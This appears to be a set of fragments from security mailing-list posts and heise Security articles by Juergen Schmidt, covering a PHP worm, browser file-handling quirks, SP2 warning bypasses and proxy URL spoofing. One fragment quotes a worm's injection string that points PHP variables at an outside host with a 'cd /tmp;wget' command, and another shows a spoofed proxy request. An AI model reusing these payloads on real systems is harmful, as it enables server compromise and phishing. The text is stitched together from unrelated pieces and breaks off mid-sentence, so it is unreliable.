On Sat, 25 Dec 2004, Pekka Savola wrote:
On Sat, 25 Dec 2004, Juergen Schmidt wrote:
It uses the Brazilian Google site to find all kinds of PHP scripts.
It parses their URLs and overwrites variables with strings like:
'http://www.visualcoders.net/spy.gif?cmd=cd /tmp;wget
not getting a response, published the information he gathered.
What should he (or your mother) do, if Mozilla is crashing on a
particular web site? Shut up? Learn how to write a buffer overflow
exploit before reporting it?
bye, ju
--
Juergen Schmidt Chefredakteur heise Security
) under Linux -- but this
may have been configured by me a long time ago.
On Windows, I can have the default opener set to my browser by adding:
Content-Disposition: attachment; filename=cttest.html
(the .html is important).
bye, ju
--
Juergen Schmidt Chefredakteur heise Security
this with Debian (unstable, j2re1.4) which uses a Java 1.4.1
from Blackdown.
It does not work.
Does this mean Blackdown's Java is not vulnerable? Or is testing for
sun.text.Utility not adequate for this?
The class sun.text.Utility is present in rt.jar.
bye, ju
--
Juergen Schmidt Chefredakteur heise
Date: 16.11.2005
Author: Juergen Schmidt, heise Security
Original article: http://www.heise.de/security/artikel/53297
German version: http://www.heise.de/security/news/meldung/53306
Flaws in SP2 security features, part II
With Service Pack 2 Microsoft introduced a couple of new security
features
= `malwarez'
1 HTTP/1.0 200 OK
...
8 Content-Type: text/html
So IE just uses the Content-Type to name this file.
bye, ju
--
Juergen Schmidt Chefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511
. If the
downloaded archive evil.zip contains evil1.exe (attrib
-R) and evil2.exe (attrib +R) and you extract them with
the Wizard into the folder evil, opening evil1 gives
you a warning, opening evil2 not.
bye, ju
--
Juergen Schmidt Chefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag
personal thoughts about this response in
the latest comment on heise Security: Microsoft: A
matter of trust,
http://www.heise.de/security/artikel/50054
--
Juergen Schmidt Chefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352
not evaluate the
redirection but passes the whole URL to the proxy:
GET http://www.heise.de%2F%20%20redir=.e-gold.com/ HTTP/1.0
bye, ju
--
Juergen Schmidt Chefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352 300 FAX
come to a different conclusion,
one thing is certain: The IT systems of the energy utility companies are
vulnerable.
http://www.heise.de/ct/english/03/18/034/
bye, ju
--
Juergen Schmidt Leitender Redakteur/senior editor c't magazin
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625